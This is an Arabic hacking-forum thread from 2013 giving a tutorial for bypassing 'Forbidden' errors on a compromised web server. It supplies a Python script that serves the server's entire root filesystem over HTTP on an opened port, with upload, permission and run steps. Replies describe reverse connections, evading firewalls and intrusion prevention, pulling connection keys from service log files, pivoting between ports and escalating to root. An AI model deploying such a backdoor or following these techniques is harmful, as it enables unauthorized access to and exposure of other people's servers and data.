.:تخطي الفوربدين عن طريق فتح بورت:.

ABO-SAGER · 05-13-2013, 07:07 PM

السلام عليكم ~

كيف الحال يا أحبتي في لله ~

اليوم معي شرح ان شاء الله راح يعجبكم ~

اليوم بإذن لله راح نتخطى الفوربدين العنيد مهما كانت قوته ~

شرط ~

ان يكون السيرفر قابل انك تفتح فيه بورت ~

اذا تبغا تعرف السيرفر يسمح انك تفتح بورت ولا لا جرب تسوي اتصال عكسي اذا نجح معك إن شاء 90% راح تتخطى ~

طيب نبدأ على بركة لله ~

الخطوة الأولى ~

نرفع السكربت التالي بمتداد py ~

كود PHP:

  #!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123

if __name__=='__main__':
    os.chdir('/')
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

    httpd = SocketServer.TCPServer(("", port), Handler)

    print("Now open this server on webbrowser at port : " + str(port))
    print("example: http://maho.com:" + str(port))
    httpd.serve_forever()

هنا تضع البورت المراد فتحة في السيرفر ~

كود PHP:

  port = 13123

الأن احفظ السكربت ورفعة على السيرفر ~

بمتداد py ولا تنسا تصرحه 0755 ~

قم بتشغيل السكربت عن طريق الأمر ~

كود PHP:

  python aa.py

الأن الصفحة راح تتطول في التحميل ~

اوك في هذي الحظة افتح صفحة جديدة في المتصفح وافتح رابط الموقع هكذا ~

كود PHP:

  http://www.xxx.com:13123

غير 13123 إلى البورت تبعك ~

والنتيجة ~

الأن تستطيع تصفح جميع ملفات السيرفر ~

وهذا الكونفيق ~

تم الشرح بوسطة ~

ABO-SAGER ~

ودمتم سالمين ^_^ ~

aircrack -ng ,Twi[L]ighT ,mido868 و 2 آخرون معجبون بهذا

المصدر: :: vBspiders Professional Network ::

>:jo'd hgt,vf]dk uk 'vdr tjp f,vj:>

oblack · 05-13-2013, 07:23 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Abo-Sagre


	السلام عليكم ~ كيف الحال يا أحبتي في لله ~ اليوم معي شرح ان شاء الله راح يعجبكم ~ اليوم بإذن لله راح نتخطى الفوربدين العنيد مهما كانت قوته ~ شرط ~ ان يكون السيرفر قابل انك تفتح فيه بورت ~ اذا تبغا تعرف السيرفر يسمح انك تفتح بورت ولا لا جرب تسوي اتصال عكسي اذا نجح معك إن شاء 90% راح تتخطى ~ طيب نبدأ على بركة لله ~ الخطوة الأولى ~ نرفع السكربت التالي بمتداد py ~ كود PHP: `#!/usr/bin/env python # devilzc0de.org (c) 2012 import SimpleHTTPServer import SocketServer import os port = 13123 if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://maho.com:" + str(port)) httpd.serve_forever()` هنا تضع البورت المراد فتحة في السيرفر ~ كود PHP: `port = 13123` الأن احفظ السكربت ورفعة على السيرفر ~ بمتداد py ولا تنسا تصرحه 0755 ~ قم بتشغيل السكربت عن طريق الأمر ~ كود PHP: `python aa.py` الأن الصفحة راح تتطول في التحميل ~ اوك في هذي الحظة افتح صفحة جديدة في المتصفح وافتح رابط الموقع هكذا ~ كود PHP: `http://www.xxx.com:13123` غير 13123 إلى البورت تبعك ~ والنتيجة ~ الأن تستطيع تصفح جميع ملفات السيرفر ~ وهذا الكونفيق ~ تم الشرح بوسطة ~ ABO-SAGER ~ ودمتم سالمين ^_^ ~

طريقة رائعة للقيام بالاتصال العكسي ولكنها لاتجدي نفعا في السيرفرات القوية فا اغلب السيرفرات تقوم بتفعيل الفيرول ووضع رولز تمنع فتح اي بورت الفوربدين مشكلة صلاحيات فاذا كانت صلاحيتك اقل من يوزر بالسيرفر فالمشكلة تكون صعبه جدا

جاري تجريب طريقتك وتطويرها لتخطي عدد من الرولز التي تمنع فتح بورت بالاعتماد على بورتات مفتوحة بالسيرفر لخدمات اخرى و استغلالها بستخادم طريقة البايبنج وايضا المجيك باكيج وجراي تطوير برنامج بهذا الشئن ترقبونا

ملاحظة : استفدت من الفكرة كثيرا ورايح نقوم بتطويرها ان شاء الله بالقريب العاجل وجاري العمل من اللحظة .

Abo-Sagre معجب بهذا

ABO-SAGER · 05-13-2013, 08:58 PM

طيف هل في طريقة نعطل رولز

Cyber Code · 05-13-2013, 10:24 PM

Change Firewall Rules

كود:

طيف هل في طريقة نعطل رولز

بارك الله فيك, موضوع جميل

Abo-Sagre معجب بهذا

oblack · 05-14-2013, 01:38 AM

اقتباس

المشاركة الأصلية كتبت بواسطة Abo-Sagre


	طيف هل في طريقة نعطل رولز

في اكثر من طريقة تعتمد حول فهمك للرولز المستخدمة في السيرفر ولكن اخطرها السيرفرات التي تستخدم هاردوير فايرول Ips هنا الوضع سيء جدا لانه يسجل كل الترفك بالشبكة و في حال رصدة لأي حركة مشبوهة يقوم على الفور بشكل ألي بوضع رولز جديدة لحجب الاتصال وتنبيه الدعم الفني لهذا يجب ان نعتمد على تخطي الرولز من خلال برامج يستخدمها السيرفر بشكل خدمات مثل smtp ftpssh telnet imap وغيرها من الخدمات .

حيث اني بالغالب اقوم بمحاولة الوصول الى اي ملف لوج لأحد هذه البرامج وسحب ال key الخاص بعملية الاتصال ومن ثم اقوم بعمل اتصال عكسي بنفس البورت المفتوح مستخدم نفس ال key الخاص بالبرنامج و القيام بعملية بايبنج من خلال ربط داينمك مع باقي الخدمات الاخرى بالسيرفر .

اما في حالة الكود الذي قمت بطرحة بالموضوع عليك بفحص بورتات الموقع فأذا وجدت بورت 443 الذي يستخدم غالبا حق ssl في هذه الحالة الامر بسيط اعمل اتصال من خلال البورت 443 , ولكني بالوقت الحالي ابحث عن طريقة الربط داينمك بين منفذ الى منفذ اخر لنفس السيرفر للحصول على صلاحية يوزر من خلال البرنامج الهدف .

ReD-HaT · 05-14-2013, 02:04 AM

موضوع في القمة
تحياتي لك

ABO-SAGER · 05-14-2013, 06:55 AM

اقتباس

المشاركة الأصلية كتبت بواسطة ReD-HaT


	موضوع في القمة تحياتي لك

الله يحيك

ABO-SAGER · 05-14-2013, 06:56 AM

اقتباس

المشاركة الأصلية كتبت بواسطة oblack


	في اكثر من طريقة تعتمد حول فهمك للرولز المستخدمة في السيرفر ولكن اخطرها السيرفرات التي تستخدم هاردوير فايرول Ips هنا الوضع سيء جدا لانه يسجل كل الترفك بالشبكة و في حال رصدة لأي حركة مشبوهة يقوم على الفور بشكل ألي بوضع رولز جديدة لحجب الاتصال وتنبيه الدعم الفني لهذا يجب ان نعتمد على تخطي الرولز من خلال برامج يستخدمها السيرفر بشكل خدمات مثل smtp ftpssh telnet imap وغيرها من الخدمات . حيث اني بالغالب اقوم بمحاولة الوصول الى اي ملف لوج لأحد هذه البرامج وسحب ال key الخاص بعملية الاتصال ومن ثم اقوم بعمل اتصال عكسي بنفس البورت المفتوح مستخدم نفس ال key الخاص بالبرنامج و القيام بعملية بايبنج من خلال ربط داينمك مع باقي الخدمات الاخرى بالسيرفر . اما في حالة الكود الذي قمت بطرحة بالموضوع عليك بفحص بورتات الموقع فأذا وجدت بورت 443 الذي يستخدم غالبا حق ssl في هذه الحالة الامر بسيط اعمل اتصال من خلال البورت 443 , ولكني بالوقت الحالي ابحث عن طريقة الربط داينمك بين منفذ الى منفذ اخر لنفس السيرفر للحصول على صلاحية يوزر من خلال البرنامج الهدف .

مشاء الله عليك باين عليك خبرة في هذا المجال

بنتظارك بعد تتطوير الفكرة

vpn_31 · 05-14-2013, 01:14 PM

تسلم على الطرح بس للأسف السيرفرات الحديثة مركبين فايرولات :(

oblack · 05-19-2013, 11:00 PM

اقتباس

المشاركة الأصلية كتبت بواسطة ABO-SAGER


	مشاء الله عليك باين عليك خبرة في هذا المجال بنتظارك بعد تتطوير الفكرة

السلام عليكم اخواني قمت بدراسة الكود بشكل مفصل ومايحدث بالسيرفر للاسف الشديد هو لا يتخطى الفوربدين وانما يستعرض لك الملفات حسب الصلاحيات المتاحة لك وايضا ممكن الاستفادة منه في حال وجود بعض القيود على بورت 80 الخاص بتصفح من ناحية وجود صفحات انديكس تمنعك من رؤية الملفات الموجودة بالمجلد , الشيل costa cgi-station الذي عرضته بموضوعي السابق يحل هذه المشكلة وبطريقة افضل من فتح بورت لانه سوف تواجة مشكله بعد فتح البورت حيث يتعرف عليه نظام الحماية الموجود باللينكس خاصه بالاصدارات الحديثة وتصبح لديك مشكلة انتيرنل سيرفر ايرور مع العلم اني قمت بتجربته بسيرفر نظام اوبينتوا 11 وليس 12 .

وايضا لا يمكنك وضع بورت مفتوح بالسيرفر لان نظام الحماية مباشرة رايح يقوم بكتشاف الكود و تعرف عليه على انه باك دور .

اقوم لان بوضع المرحلة الثانيه من البحث لتطوير الفكرة بستخدام تقنية البايبنج وهيه تقنيه ليست بالسهله لاستغلال الصلاحية من خلال التنقل بين المنافذ المفتوحة واستغلال صلاحية البرامج للحصول على صلاحية يوزر ومن ثم صلاحية روت اتمنى من لدية الخبرة ان يساعدني في اتمام هذا البحث حتى افرغ منه بشكل اسرع .